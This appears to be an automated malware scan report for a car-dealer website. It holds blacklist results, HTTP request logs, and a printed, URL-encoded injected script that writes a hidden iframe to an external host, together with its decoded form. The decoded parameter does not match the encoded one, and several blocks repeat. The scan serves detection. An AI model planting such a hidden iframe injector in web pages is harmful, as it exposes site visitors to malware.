Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=toyota-rathenow.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://toyota-rathenow.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://toyota-rathenow.com/ | 200 OK Content-Length: 7284 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var c='%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%79%61%6e%61%73%73%75%74%65%62%65%76%72%6f%74%6f%6b%2e%66%72%65%65%68%6f%73%74%69%61%2e%63%6f%6d%2f%3f%6e%3d%31%35%31%22%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%22%3e%3c%2f%69%66%72%61%6d%65%3e';document.write(unescape(c)); Decoded script: <iframe src="http://yanassutebevrotok.freehostia.com/?n=366" style="display:none;"></iframe> | ||
http://toyota-rathenow.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: toyota-rathenow.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:20:36 GMT
Server: Apache/2.2.27 (Unix)
Content-Type: text/html
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: toyota-rathenow.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:20:36 GMT
Server: Apache/2.2.27 (Unix)
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: toyota-rathenow.com
Referer: http://www.google.com/search?q=toyota-rathenow.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: toyota-rathenow.com
Referer: http://www.google.com/search?q=toyota-rathenow.com
Result:
The result is similar to the first query. There are no suspicious redirects found.